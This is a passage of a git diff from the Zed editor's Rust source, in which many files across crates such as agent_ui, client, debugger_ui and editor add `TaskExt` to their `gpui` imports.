DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, MouseDownEvent, - Render, SharedString, Task, WeakEntity, Window, + Render, SharedString, Task, TaskExt, WeakEntity, Window, }; use itertools::Itertools as _; use notifications::status_toast::StatusToast; diff --git a/crates/agent_ui/src/thread_metadata_store.rs b/crates/agent_ui/src/thread_metadata_store.rs index 2e6c3313eba11a..00d132f5a36e36 100644 --- a/crates/agent_ui/src/thread_metadata_store.rs +++ b/crates/agent_ui/src/thread_metadata_store.rs @@ -20,7 +20,7 @@ use db::{ }; use fs::Fs; use futures::{FutureExt, future::Shared}; -use gpui::{AppContext as _, Entity, Global, Subscription, Task}; +use gpui::{AppContext as _, Entity, Global, Subscription, Task, TaskExt}; pub use project::WorktreePaths; use project::{AgentId, linked_worktree_short_name}; use remote::{RemoteConnectionOptions, same_remote_connection_identity}; diff --git a/crates/agent_ui/src/threads_archive_view.rs b/crates/agent_ui/src/threads_archive_view.rs index 8283692887601c..5da5526b3df368 100644 --- a/crates/agent_ui/src/threads_archive_view.rs +++ b/crates/agent_ui/src/threads_archive_view.rs @@ -19,7 +19,8 @@ use fs::Fs; use fuzzy::{StringMatch, StringMatchCandidate}; use gpui::{ AnyElement, App, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, - ListState, Render, SharedString, Subscription, Task, WeakEntity, Window, list, prelude::*, px, + ListState, Render, SharedString, Subscription, Task, TaskExt, WeakEntity, Window, list, + prelude::*, px, }; use itertools::Itertools as _; use menu::{Confirm, SelectFirst, SelectLast, SelectNext, SelectPrevious}; diff --git a/crates/agent_ui/src/ui/mention_crease.rs b/crates/agent_ui/src/ui/mention_crease.rs index e3059ab87247dd..236e57ddffb1e5 100644 --- a/crates/agent_ui/src/ui/mention_crease.rs +++ b/crates/agent_ui/src/ui/mention_crease.rs @@ -4,7 +4,8 @@ use acp_thread::MentionUri; use agent_client_protocol::schema as acp; use editor::{Editor, SelectionEffects, 
scroll::Autoscroll}; use gpui::{ - Animation, AnimationExt, AnyView, Context, IntoElement, WeakEntity, Window, pulsating_between, + Animation, AnimationExt, AnyView, Context, IntoElement, TaskExt, WeakEntity, Window, + pulsating_between, }; use prompt_store::PromptId; use rope::Point; diff --git a/crates/ai_onboarding/src/ai_onboarding.rs b/crates/ai_onboarding/src/ai_onboarding.rs index 147458923045c1..bc1dabefd28cc5 100644 --- a/crates/ai_onboarding/src/ai_onboarding.rs +++ b/crates/ai_onboarding/src/ai_onboarding.rs @@ -16,7 +16,7 @@ pub use young_account_banner::YoungAccountBanner; use std::sync::Arc; use client::{Client, UserStore, zed_urls}; -use gpui::{AnyElement, Entity, IntoElement, ParentElement}; +use gpui::{AnyElement, Entity, IntoElement, ParentElement, TaskExt}; use ui::{Divider, RegisterComponent, Tooltip, Vector, VectorName, prelude::*}; #[derive(PartialEq)] diff --git a/crates/auto_update/src/auto_update.rs b/crates/auto_update/src/auto_update.rs index a057a30c6d37e9..c1b15aa3b6c371 100644 --- a/crates/auto_update/src/auto_update.rs +++ b/crates/auto_update/src/auto_update.rs @@ -3,8 +3,8 @@ use client::Client; use db::kvp::KeyValueStore; use futures_lite::StreamExt; use gpui::{ - App, AppContext as _, AsyncApp, BackgroundExecutor, Context, Entity, Global, Task, Window, - actions, + App, AppContext as _, AsyncApp, BackgroundExecutor, Context, Entity, Global, Task, TaskExt, + Window, actions, }; use http_client::{HttpClient, HttpClientWithUrl}; use paths::remote_servers_dir; diff --git a/crates/auto_update_ui/src/auto_update_ui.rs b/crates/auto_update_ui/src/auto_update_ui.rs index 77ba83597edf4e..6bd577ddb1bd24 100644 --- a/crates/auto_update_ui/src/auto_update_ui.rs +++ b/crates/auto_update_ui/src/auto_update_ui.rs @@ -6,7 +6,8 @@ use db::kvp::Dismissable; use editor::{Editor, MultiBuffer}; use fs::Fs; use gpui::{ - App, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, Window, actions, prelude::*, + App, DismissEvent, Entity, 
EventEmitter, FocusHandle, Focusable, TaskExt, Window, actions, + prelude::*, }; use markdown_preview::markdown_preview_view::{MarkdownPreviewMode, MarkdownPreviewView}; use notifications::status_toast::StatusToast; diff --git a/crates/call/src/call_impl/mod.rs b/crates/call/src/call_impl/mod.rs index c0c1535cd45684..eabc214b11527b 100644 --- a/crates/call/src/call_impl/mod.rs +++ b/crates/call/src/call_impl/mod.rs @@ -9,7 +9,7 @@ use collections::HashSet; use futures::{Future, FutureExt, channel::oneshot, future::Shared}; use gpui::{ AnyView, App, AppContext as _, AsyncApp, Context, Entity, EventEmitter, Subscription, Task, - WeakEntity, Window, + TaskExt, WeakEntity, Window, }; use postage::watch; use project::Project; diff --git a/crates/call/src/call_impl/room.rs b/crates/call/src/call_impl/room.rs index f9df2b758f7664..658c2b620643f5 100644 --- a/crates/call/src/call_impl/room.rs +++ b/crates/call/src/call_impl/room.rs @@ -14,7 +14,7 @@ use fs::Fs; use futures::StreamExt; use gpui::{ App, AppContext as _, AsyncApp, Context, Entity, EventEmitter, FutureExt as _, - ScreenCaptureSource, ScreenCaptureStream, Task, Timeout, WeakEntity, + ScreenCaptureSource, ScreenCaptureStream, Task, TaskExt, Timeout, WeakEntity, }; use gpui_tokio::Tokio; use language::LanguageRegistry; diff --git a/crates/client/src/client.rs b/crates/client/src/client.rs index 5bc34320a87e1a..fc3c5126774048 100644 --- a/crates/client/src/client.rs +++ b/crates/client/src/client.rs @@ -26,7 +26,7 @@ use futures::{ future::BoxFuture, stream::BoxStream, }; -use gpui::{App, AsyncApp, Entity, Global, Task, WeakEntity, actions}; +use gpui::{App, AsyncApp, Entity, Global, Task, TaskExt, WeakEntity, actions}; use http_client::{HttpClient, HttpClientWithUrl, http, read_proxy_from_env}; use parking_lot::{Mutex, RwLock}; use postage::watch; diff --git a/crates/client/src/llm_token.rs b/crates/client/src/llm_token.rs index 70457679e4b965..058be7905fa12d 100644 --- a/crates/client/src/llm_token.rs +++ 
b/crates/client/src/llm_token.rs @@ -4,6 +4,7 @@ use cloud_api_types::websocket_protocol::MessageToClient; use cloud_llm_client::{EXPIRED_LLM_TOKEN_HEADER_NAME, OUTDATED_LLM_TOKEN_HEADER_NAME}; use gpui::{ App, AppContext as _, Context, Entity, EventEmitter, Global, ReadGlobal as _, Subscription, + TaskExt, }; use std::sync::Arc; diff --git a/crates/client/src/user.rs b/crates/client/src/user.rs index 0f43690491387e..3673393631d3c2 100644 --- a/crates/client/src/user.rs +++ b/crates/client/src/user.rs @@ -15,7 +15,8 @@ use derive_more::Deref; use feature_flags::FeatureFlagAppExt; use futures::{Future, StreamExt, channel::mpsc}; use gpui::{ - App, AsyncApp, Context, Entity, EventEmitter, SharedString, SharedUri, Task, WeakEntity, + App, AsyncApp, Context, Entity, EventEmitter, SharedString, SharedUri, Task, TaskExt, + WeakEntity, }; use http_client::http::{HeaderMap, HeaderValue}; use postage::{sink::Sink, watch}; diff --git a/crates/collab/tests/integration/random_project_collaboration_tests.rs b/crates/collab/tests/integration/random_project_collaboration_tests.rs index ab5bde6d3215fa..a7eaa9cd60f116 100644 --- a/crates/collab/tests/integration/random_project_collaboration_tests.rs +++ b/crates/collab/tests/integration/random_project_collaboration_tests.rs @@ -7,7 +7,7 @@ use collections::{BTreeMap, HashMap}; use editor::Bias; use fs::{FakeFs, Fs as _}; use git::status::{FileStatus, StatusCode, TrackedStatus, UnmergedStatus, UnmergedStatusCode}; -use gpui::{BackgroundExecutor, Entity, TestAppContext}; +use gpui::{BackgroundExecutor, Entity, TaskExt, TestAppContext}; use language::{ FakeLspAdapter, Language, LanguageConfig, LanguageMatcher, PointUtf16, range_to_lsp, }; diff --git a/crates/collab_ui/src/collab_panel/channel_modal.rs b/crates/collab_ui/src/collab_panel/channel_modal.rs index 1781a8e93e0476..befe7703e65ae6 100644 --- a/crates/collab_ui/src/collab_panel/channel_modal.rs +++ b/crates/collab_ui/src/collab_panel/channel_modal.rs @@ -6,7 +6,8 @@ use 
client::{ use fuzzy::{StringMatchCandidate, match_strings}; use gpui::{ App, ClipboardItem, Context, DismissEvent, Entity, EventEmitter, Focusable, ParentElement, - Render, Styled, Subscription, Task, WeakEntity, Window, actions, anchored, deferred, div, + Render, Styled, Subscription, Task, TaskExt, WeakEntity, Window, actions, anchored, deferred, + div, }; use picker::{Picker, PickerDelegate}; use std::sync::Arc; diff --git a/crates/collab_ui/src/notifications/incoming_call_notification.rs b/crates/collab_ui/src/notifications/incoming_call_notification.rs index 71940794f4180e..5a9628ac87d9ad 100644 --- a/crates/collab_ui/src/notifications/incoming_call_notification.rs +++ b/crates/collab_ui/src/notifications/incoming_call_notification.rs @@ -1,7 +1,7 @@ use crate::notification_window_options; use call::{ActiveCall, IncomingCall}; use futures::StreamExt; -use gpui::{App, WindowHandle, prelude::*}; +use gpui::{App, TaskExt, WindowHandle, prelude::*}; use std::sync::{Arc, Weak}; use ui::{CollabNotification, prelude::*}; diff --git a/crates/collab_ui/src/notifications/project_shared_notification.rs b/crates/collab_ui/src/notifications/project_shared_notification.rs index 3c231c5397af23..e39d1cd32a503f 100644 --- a/crates/collab_ui/src/notifications/project_shared_notification.rs +++ b/crates/collab_ui/src/notifications/project_shared_notification.rs @@ -2,7 +2,7 @@ use crate::notification_window_options; use call::{ActiveCall, room}; use client::User; use collections::HashMap; -use gpui::{App, Size}; +use gpui::{App, Size, TaskExt}; use std::sync::{Arc, Weak}; use ui::{CollabNotification, prelude::*}; diff --git a/crates/command_palette/src/command_palette.rs b/crates/command_palette/src/command_palette.rs index 68d04537a0261c..35af6f071be5de 100644 --- a/crates/command_palette/src/command_palette.rs +++ b/crates/command_palette/src/command_palette.rs @@ -16,7 +16,7 @@ use command_palette_hooks::{ use fuzzy_nucleo::{StringMatch, StringMatchCandidate}; use gpui::{ 
Action, App, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, - ParentElement, Render, Styled, Task, WeakEntity, Window, + ParentElement, Render, Styled, Task, TaskExt, WeakEntity, Window, }; use persistence::CommandPaletteDB; use picker::Direction; diff --git a/crates/copilot/src/copilot_edit_prediction_delegate.rs b/crates/copilot/src/copilot_edit_prediction_delegate.rs index e789a89df65daf..4b75feafe4b38b 100644 --- a/crates/copilot/src/copilot_edit_prediction_delegate.rs +++ b/crates/copilot/src/copilot_edit_prediction_delegate.rs @@ -10,7 +10,7 @@ use edit_prediction_types::{ EditPrediction, EditPredictionDelegate, EditPredictionDiscardReason, EditPredictionIconSet, interpolate_edits, }; -use gpui::{App, Context, Entity, Task}; +use gpui::{App, Context, Entity, Task, TaskExt}; use icons::IconName; use language::{Anchor, Buffer, BufferSnapshot, EditPreview, OffsetRangeExt, ToPointUtf16}; use std::{ops::Range, sync::Arc, time::Duration}; diff --git a/crates/copilot_chat/src/copilot_chat.rs b/crates/copilot_chat/src/copilot_chat.rs index fb89c2e0853f73..ab5c08b617473f 100644 --- a/crates/copilot_chat/src/copilot_chat.rs +++ b/crates/copilot_chat/src/copilot_chat.rs @@ -9,6 +9,7 @@ use anyhow::{Result, anyhow}; use collections::HashSet; use fs::Fs; use futures::{AsyncBufReadExt, AsyncReadExt, StreamExt, io::BufReader, stream::BoxStream}; +use gpui::TaskExt; use gpui::WeakEntity; use gpui::{App, AsyncApp, Global, prelude::*}; use http_client::HttpRequestExt; diff --git a/crates/copilot_ui/src/sign_in.rs b/crates/copilot_ui/src/sign_in.rs index 09267020e5c359..f0408ea063a542 100644 --- a/crates/copilot_ui/src/sign_in.rs +++ b/crates/copilot_ui/src/sign_in.rs @@ -6,7 +6,7 @@ use copilot::{ use gpui::{ App, ClipboardItem, Context, DismissEvent, Element, Entity, EventEmitter, FocusHandle, Focusable, InteractiveElement, IntoElement, MouseDownEvent, ParentElement, Render, Styled, - Subscription, Window, WindowBounds, WindowOptions, div, point, + 
Subscription, TaskExt, Window, WindowBounds, WindowOptions, div, point, }; use project::project_settings::ProjectSettings; use settings::Settings as _; diff --git a/crates/debugger_tools/src/dap_log.rs b/crates/debugger_tools/src/dap_log.rs index 749a6cd7888301..76d31bdd23221c 100644 --- a/crates/debugger_tools/src/dap_log.rs +++ b/crates/debugger_tools/src/dap_log.rs @@ -11,7 +11,8 @@ use futures::{ }; use gpui::{ App, AppContext, Context, Empty, Entity, EventEmitter, FocusHandle, Focusable, IntoElement, - ParentElement, Render, SharedString, Styled, Subscription, WeakEntity, Window, actions, div, + ParentElement, Render, SharedString, Styled, Subscription, TaskExt, WeakEntity, Window, + actions, div, }; use project::{ Project, diff --git a/crates/debugger_ui/src/attach_modal.rs b/crates/debugger_ui/src/attach_modal.rs index 6e537ae0c6e1db..5f07f2a70d2837 100644 --- a/crates/debugger_ui/src/attach_modal.rs +++ b/crates/debugger_ui/src/attach_modal.rs @@ -1,7 +1,7 @@ use dap::{DapRegistry, DebugRequest}; use futures::channel::oneshot; use fuzzy::{StringMatch, StringMatchCandidate}; -use gpui::{AppContext, DismissEvent, Entity, EventEmitter, Focusable, Render, Task}; +use gpui::{AppContext, DismissEvent, Entity, EventEmitter, Focusable, Render, Task, TaskExt}; use gpui::{Subscription, WeakEntity}; use picker::{Picker, PickerDelegate}; use project::Project; diff --git a/crates/debugger_ui/src/debugger_panel.rs b/crates/debugger_ui/src/debugger_panel.rs index f92b87a773c82d..36327d7695c131 100644 --- a/crates/debugger_ui/src/debugger_panel.rs +++ b/crates/debugger_ui/src/debugger_panel.rs @@ -19,7 +19,7 @@ use feature_flags::{FeatureFlag, FeatureFlagAppExt as _, PresenceFlag, register_ use gpui::{ Action, Anchor, App, AsyncWindowContext, ClipboardItem, Context, DismissEvent, Entity, EntityId, EventEmitter, FocusHandle, Focusable, MouseButton, MouseDownEvent, Point, - Subscription, Task, WeakEntity, anchored, deferred, + Subscription, Task, TaskExt, WeakEntity, 
anchored, deferred, }; use itertools::Itertools as _; diff --git a/crates/debugger_ui/src/debugger_ui.rs b/crates/debugger_ui/src/debugger_ui.rs index f5947a4393b2ee..2fe87d1ef00540 100644 --- a/crates/debugger_ui/src/debugger_ui.rs +++ b/crates/debugger_ui/src/debugger_ui.rs @@ -2,7 +2,7 @@ use std::any::TypeId; use debugger_panel::DebugPanel; use editor::{Editor, MultiBufferOffsetUtf16}; -use gpui::{Action, App, DispatchPhase, EntityInputHandler, actions}; +use gpui::{Action, App, DispatchPhase, EntityInputHandler, TaskExt, actions}; use new_process_modal::{NewProcessModal, NewProcessMode}; use project::debugger::{self, breakpoint_store::SourceBreakpoint, session::ThreadStatus}; use schemars::JsonSchema; diff --git a/crates/debugger_ui/src/new_process_modal.rs b/crates/debugger_ui/src/new_process_modal.rs index f0d243995f6991..6c1fe4c45b4e29 100644 --- a/crates/debugger_ui/src/new_process_modal.rs +++ b/crates/debugger_ui/src/new_process_modal.rs @@ -16,7 +16,7 @@ use editor::Editor; use fuzzy::{StringMatch, StringMatchCandidate}; use gpui::{ Action, App, AppContext, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, - KeyContext, Render, Subscription, Task, WeakEntity, actions, + KeyContext, Render, Subscription, Task, TaskExt, WeakEntity, actions, }; use itertools::Itertools as _; use picker::{Picker, PickerDelegate, highlighted_match_with_paths::HighlightedMatch}; diff --git a/crates/debugger_ui/src/session/running.rs b/crates/debugger_ui/src/session/running.rs index c496aa193a92d9..a964eb389f610e 100644 --- a/crates/debugger_ui/src/session/running.rs +++ b/crates/debugger_ui/src/session/running.rs @@ -33,7 +33,7 @@ use dap::{ use futures::{SinkExt, channel::mpsc}; use gpui::{ Action as _, AnyView, AppContext, Axis, Entity, EntityId, EventEmitter, FocusHandle, Focusable, - NoAction, Pixels, Point, Subscription, Task, WeakEntity, + NoAction, Pixels, Point, Subscription, Task, TaskExt, WeakEntity, }; use language::Buffer; use 
loaded_source_list::LoadedSourceList; diff --git a/crates/debugger_ui/src/session/running/stack_frame_list.rs b/crates/debugger_ui/src/session/running/stack_frame_list.rs index 7175b8556a45f0..982fc0f8567bc1 100644 --- a/crates/debugger_ui/src/session/running/stack_frame_list.rs +++ b/crates/debugger_ui/src/session/running/stack_frame_list.rs @@ -8,7 +8,7 @@ use dap::adapters::DebugAdapterName; use db::kvp::KeyValueStore; use gpui::{ Action, AnyElement, Entity, EventEmitter, FocusHandle, Focusable, FontWeight, ListState, - Subscription, Task, WeakEntity, list, + Subscription, Task, TaskExt, WeakEntity, list, }; use util::{ debug_panic, diff --git a/crates/debugger_ui/src/session/running/variable_list.rs b/crates/debugger_ui/src/session/running/variable_list.rs index 991961f627cb0c..4f39ae49db9d16 100644 --- a/crates/debugger_ui/src/session/running/variable_list.rs +++ b/crates/debugger_ui/src/session/running/variable_list.rs @@ -8,8 +8,9 @@ use dap::{ use editor::Editor; use gpui::{ Action, AnyElement, ClickEvent, ClipboardItem, Context, DismissEvent, Empty, Entity, - FocusHandle, Focusable, Hsla, MouseDownEvent, Point, Subscription, TextStyleRefinement, - UniformListScrollHandle, WeakEntity, actions, anchored, deferred, uniform_list, + FocusHandle, Focusable, Hsla, MouseDownEvent, Point, Subscription, TaskExt, + TextStyleRefinement, UniformListScrollHandle, WeakEntity, actions, anchored, deferred, + uniform_list, }; use itertools::Itertools; use menu::{SelectFirst, SelectLast, SelectNext, SelectPrevious}; diff --git a/crates/diagnostics/src/buffer_diagnostics.rs b/crates/diagnostics/src/buffer_diagnostics.rs index e703e193c312e9..b05e6a0f438918 100644 --- a/crates/diagnostics/src/buffer_diagnostics.rs +++ b/crates/diagnostics/src/buffer_diagnostics.rs @@ -13,7 +13,7 @@ use editor::{ use gpui::{ AnyElement, App, AppContext, Context, Entity, EntityId, EventEmitter, FocusHandle, Focusable, InteractiveElement, IntoElement, ParentElement, Render, SharedString, Styled, 
Subscription, - Task, WeakEntity, Window, actions, div, + Task, TaskExt, WeakEntity, Window, actions, div, }; use language::{Buffer, Capability, DiagnosticEntry, DiagnosticEntryRef, Point}; use project::{ diff --git a/crates/edit_prediction/src/edit_prediction.rs b/crates/edit_prediction/src/edit_prediction.rs index 6c98e296ef4256..e61cafa6adced1 100644 --- a/crates/edit_prediction/src/edit_prediction.rs +++ b/crates/edit_prediction/src/edit_prediction.rs @@ -24,6 +24,7 @@ use futures::{ select_biased, }; use gpui::BackgroundExecutor; +use gpui::TaskExt; use gpui::http_client::Url; use gpui::{ App, AsyncApp, Entity, EntityId, Global, SharedString, Task, WeakEntity, actions, diff --git a/crates/edit_prediction/src/mercury.rs b/crates/edit_prediction/src/mercury.rs index 8e9dfa6cee34d2..492071f7c7b4bf 100644 --- a/crates/edit_prediction/src/mercury.rs +++ b/crates/edit_prediction/src/mercury.rs @@ -8,7 +8,7 @@ use cloud_llm_client::EditPredictionRejectReason; use credentials_provider::CredentialsProvider; use futures::AsyncReadExt as _; use gpui::{ - App, AppContext as _, Context, Entity, Global, SharedString, Task, + App, AppContext as _, Context, Entity, Global, SharedString, Task, TaskExt, http_client::{self, AsyncBody, HttpClient, Method, StatusCode}, }; use language::{ToOffset, ToPoint as _}; diff --git a/crates/edit_prediction/src/ollama.rs b/crates/edit_prediction/src/ollama.rs index 0ae90dd9f6eca4..fc0f36d8321771 100644 --- a/crates/edit_prediction/src/ollama.rs +++ b/crates/edit_prediction/src/ollama.rs @@ -1,7 +1,7 @@ use anyhow::{Context as _, Result}; use futures::AsyncReadExt as _; use gpui::{ - App, SharedString, + App, SharedString, TaskExt, http_client::{self, HttpClient}, }; use language::language_settings::OpenAiCompatibleEditPredictionSettings; diff --git a/crates/edit_prediction/src/zeta.rs b/crates/edit_prediction/src/zeta.rs index c2e622ea010fea..7f9f12884709d4 100644 --- a/crates/edit_prediction/src/zeta.rs +++ 
b/crates/edit_prediction/src/zeta.rs @@ -10,7 +10,7 @@ use cloud_llm_client::{ AcceptEditPredictionBody, EditPredictionRejectReason, predict_edits_v3::RawCompletionRequest, }; use edit_prediction_types::PredictedCursorPosition; -use gpui::{App, AppContext as _, Entity, Task, WeakEntity, prelude::*}; +use gpui::{App, AppContext as _, Entity, Task, TaskExt, WeakEntity, prelude::*}; use language::{ Buffer, BufferSnapshot, DiagnosticSeverity, OffsetRangeExt as _, ToOffset as _, language_settings::all_language_settings, text_diff, diff --git a/crates/edit_prediction_context/src/edit_prediction_context.rs b/crates/edit_prediction_context/src/edit_prediction_context.rs index bbd12dec4e3b0f..a5dd0c157830b1 100644 --- a/crates/edit_prediction_context/src/edit_prediction_context.rs +++ b/crates/edit_prediction_context/src/edit_prediction_context.rs @@ -2,7 +2,9 @@ use crate::assemble_excerpts::assemble_excerpt_ranges; use anyhow::Result; use collections::HashMap; use futures::{FutureExt, StreamExt as _, channel::mpsc, future}; -use gpui::{App, AppContext, AsyncApp, Context, Entity, EntityId, EventEmitter, Task, WeakEntity}; +use gpui::{ + App, AppContext, AsyncApp, Context, Entity, EntityId, EventEmitter, Task, TaskExt, WeakEntity, +}; use language::{Anchor, Buffer, BufferSnapshot, OffsetRangeExt as _, Point, ToOffset as _}; use project::{LocationLink, Project, ProjectPath}; use smallvec::SmallVec; diff --git a/crates/edit_prediction_ui/src/edit_prediction_button.rs b/crates/edit_prediction_ui/src/edit_prediction_button.rs index d8e52fe8a7bb40..9f2b7a5f1fcf07 100644 --- a/crates/edit_prediction_ui/src/edit_prediction_button.rs +++ b/crates/edit_prediction_ui/src/edit_prediction_button.rs @@ -12,7 +12,7 @@ use feature_flags::FeatureFlagAppExt; use fs::Fs; use gpui::{ Action, Anchor, Animation, AnimationExt, App, AsyncWindowContext, Entity, FocusHandle, - Focusable, IntoElement, ParentElement, Render, Subscription, WeakEntity, actions, div, + Focusable, IntoElement, 
ParentElement, Render, Subscription, TaskExt, WeakEntity, actions, div, ease_in_out, pulsating_between, }; use indoc::indoc; diff --git a/crates/edit_prediction_ui/src/edit_prediction_ui.rs b/crates/edit_prediction_ui/src/edit_prediction_ui.rs index 2f6280619adafd..05f1224f50676f 100644 --- a/crates/edit_prediction_ui/src/edit_prediction_ui.rs +++ b/crates/edit_prediction_ui/src/edit_prediction_ui.rs @@ -7,6 +7,7 @@ use edit_prediction::{EditPredictionStore, ResetOnboarding, capture_example}; use edit_prediction_context_view::EditPredictionContextView; use editor::Editor; use feature_flags::FeatureFlagAppExt as _; +use gpui::TaskExt; use gpui::actions; use language::language_settings::AllLanguageSettings; use project::DisableAiSettings; diff --git a/crates/editor/src/clangd_ext.rs b/crates/editor/src/clangd_ext.rs index c52089ca6ac249..fbe58b06abb7ed 100644 --- a/crates/editor/src/clangd_ext.rs +++ b/crates/editor/src/clangd_ext.rs @@ -1,5 +1,5 @@ use anyhow::Context as _; -use gpui::{App, Context, Entity, Window}; +use gpui::{App, Context, Entity, TaskExt, Window}; use language::Language; use project::lsp_store::lsp_ext_command::SwitchSourceHeaderResult; use rpc::proto; diff --git a/crates/editor/src/code_context_menus.rs b/crates/editor/src/code_context_menus.rs index 2c609e5ba81a00..904ebb1f810625 100644 --- a/crates/editor/src/code_context_menus.rs +++ b/crates/editor/src/code_context_menus.rs @@ -2,8 +2,8 @@ use crate::scroll::ScrollAmount; use fuzzy::{StringMatch, StringMatchCandidate}; use gpui::{ AnyElement, Entity, Focusable, FontWeight, ListSizingBehavior, ScrollHandle, ScrollStrategy, - SharedString, Size, StrikethroughStyle, StyledText, Task, UniformListScrollHandle, div, px, - uniform_list, + SharedString, Size, StrikethroughStyle, StyledText, Task, TaskExt, UniformListScrollHandle, + div, px, uniform_list, }; use itertools::Itertools; use language::CodeLabel; diff --git a/crates/editor/src/code_lens.rs b/crates/editor/src/code_lens.rs index 
c123eceea3d125..c78620e25fda43 100644 --- a/crates/editor/src/code_lens.rs +++ b/crates/editor/src/code_lens.rs @@ -2,7 +2,7 @@ use std::sync::Arc; use collections::{HashMap, HashSet}; use futures::future::join_all; -use gpui::{MouseButton, SharedString, Task, WeakEntity}; +use gpui::{MouseButton, SharedString, Task, TaskExt, WeakEntity}; use itertools::Itertools; use language::{BufferId, ClientCommand}; use multi_buffer::{Anchor, MultiBufferRow, MultiBufferSnapshot, ToPoint as _}; diff --git a/crates/editor/src/editor_tests.rs b/crates/editor/src/editor_tests.rs index 304f44d3c38b1b..9649b638a3b93b 100644 --- a/crates/editor/src/editor_tests.rs +++ b/crates/editor/src/editor_tests.rs @@ -18,8 +18,8 @@ use buffer_diff::{BufferDiff, DiffHunkSecondaryStatus, DiffHunkStatus, DiffHunkS use collections::HashMap; use futures::{StreamExt, channel::oneshot}; use gpui::{ - BackgroundExecutor, DismissEvent, Task, TestAppContext, UpdateGlobal, VisualTestContext, - WindowBounds, WindowOptions, div, + BackgroundExecutor, DismissEvent, Task, TaskExt, TestAppContext, UpdateGlobal, + VisualTestContext, WindowBounds, WindowOptions, div, }; use indoc::indoc; use language::{ diff --git a/crates/editor/src/element.rs b/crates/editor/src/element.rs index 7e751535910420..22eaeca92e44fe 100644 --- a/crates/editor/src/element.rs +++ b/crates/editor/src/element.rs @@ -46,9 +46,9 @@ use gpui::{ Modifiers, ModifiersChangedEvent, MouseButton, MouseClickEvent, MouseDownEvent, MouseMoveEvent, MousePressureEvent, MouseUpEvent, PaintQuad, ParentElement, Pixels, PressureStage, ScrollDelta, ScrollHandle, ScrollWheelEvent, ShapedLine, SharedString, Size, StatefulInteractiveElement, - Style, Styled, StyledText, TextAlign, TextRun, TextStyleRefinement, WeakEntity, Window, - anchored, deferred, div, fill, linear_color_stop, linear_gradient, outline, pattern_slash, - point, px, quad, relative, size, solid_background, transparent_black, + Style, Styled, StyledText, TaskExt, TextAlign, TextRun, 
TextStyleRefinement, WeakEntity, + Window, anchored, deferred, div, fill, linear_color_stop, linear_gradient, outline, + pattern_slash, point, px, quad, relative, size, solid_background, transparent_black, }; use itertools::Itertools; use language::{ diff --git a/crates/editor/src/hover_popover.rs b/crates/editor/src/hover_popover.rs index cfa7284127e968..6474170aacea3b 100644 --- a/crates/editor/src/hover_popover.rs +++ b/crates/editor/src/hover_popover.rs @@ -11,8 +11,8 @@ use anyhow::Context as _; use gpui::{ AnyElement, App, AsyncWindowContext, Bounds, Context, Entity, Focusable as _, FontWeight, Hsla, InteractiveElement, IntoElement, MouseButton, ParentElement, Pixels, ScrollHandle, Size, - StatefulInteractiveElement, StyleRefinement, Styled, Subscription, Task, TextStyleRefinement, - Window, canvas, div, px, + StatefulInteractiveElement, StyleRefinement, Styled, Subscription, Task, TaskExt, + TextStyleRefinement, Window, canvas, div, px, }; use itertools::Itertools; use language::{DiagnosticEntry, Language, LanguageRegistry}; diff --git a/crates/editor/src/rust_analyzer_ext.rs b/crates/editor/src/rust_analyzer_ext.rs index 6d4d5999617617..ab59586c3a86a3 100644 --- a/crates/editor/src/rust_analyzer_ext.rs +++ b/crates/editor/src/rust_analyzer_ext.rs @@ -1,7 +1,7 @@ use std::{fs, path::Path}; use anyhow::Context as _; -use gpui::{App, AppContext as _, Context, Entity, Window}; +use gpui::{App, AppContext as _, Context, Entity, TaskExt, Window}; use language::{Capability, Language, proto::serialize_anchor}; use multi_buffer::MultiBuffer; use project::{ diff --git a/crates/extension_host/src/extension_host.rs b/crates/extension_host/src/extension_host.rs index ca43b4a3993f6e..4ebee680621182 100644 --- a/crates/extension_host/src/extension_host.rs +++ b/crates/extension_host/src/extension_host.rs @@ -31,8 +31,8 @@ use futures::{ select_biased, }; use gpui::{ - App, AppContext as _, AsyncApp, Context, Entity, EventEmitter, Global, Task, UpdateGlobal as _, - 
WeakEntity, actions, + App, AppContext as _, AsyncApp, Context, Entity, EventEmitter, Global, Task, TaskExt, + UpdateGlobal as _, WeakEntity, actions, }; use http_client::{AsyncBody, HttpClient, HttpClientWithUrl}; use language::{ diff --git a/crates/extension_host/src/extension_store_test.rs b/crates/extension_host/src/extension_store_test.rs index abdb3ffd3fad2b..2e2408ea2d901b 100644 --- a/crates/extension_host/src/extension_store_test.rs +++ b/crates/extension_host/src/extension_store_test.rs @@ -8,7 +8,7 @@ use collections::{BTreeMap, HashSet}; use extension::ExtensionHostProxy; use fs::{FakeFs, Fs, RealFs}; use futures::{AsyncReadExt, FutureExt, StreamExt, io::BufReader}; -use gpui::{AppContext as _, BackgroundExecutor, TestAppContext}; +use gpui::{AppContext as _, BackgroundExecutor, TaskExt, TestAppContext}; use http_client::{FakeHttpClient, Response}; use language::{BinaryStatus, LanguageMatcher, LanguageName, LanguageRegistry}; use language_extension::LspAccess; diff --git a/crates/extensions_ui/src/extensions_ui.rs b/crates/extensions_ui/src/extensions_ui.rs index 0e6bfe8498dc5b..af3b9031e44eee 100644 --- a/crates/extensions_ui/src/extensions_ui.rs +++ b/crates/extensions_ui/src/extensions_ui.rs @@ -15,7 +15,7 @@ use extension_host::{ExtensionManifest, ExtensionOperation, ExtensionStore}; use fuzzy::{StringMatchCandidate, match_strings}; use gpui::{ Action, Anchor, App, ClipboardItem, Context, Entity, EventEmitter, Focusable, - InteractiveElement, KeyContext, ParentElement, Point, Render, Styled, Task, TextStyle, + InteractiveElement, KeyContext, ParentElement, Point, Render, Styled, Task, TaskExt, TextStyle, UniformListScrollHandle, WeakEntity, Window, actions, point, uniform_list, }; use num_format::{Locale, ToFormattedString}; diff --git a/crates/file_finder/src/file_finder.rs b/crates/file_finder/src/file_finder.rs index 66acefde69f122..c15524b17bfe50 100644 --- a/crates/file_finder/src/file_finder.rs +++ b/crates/file_finder/src/file_finder.rs @@ 
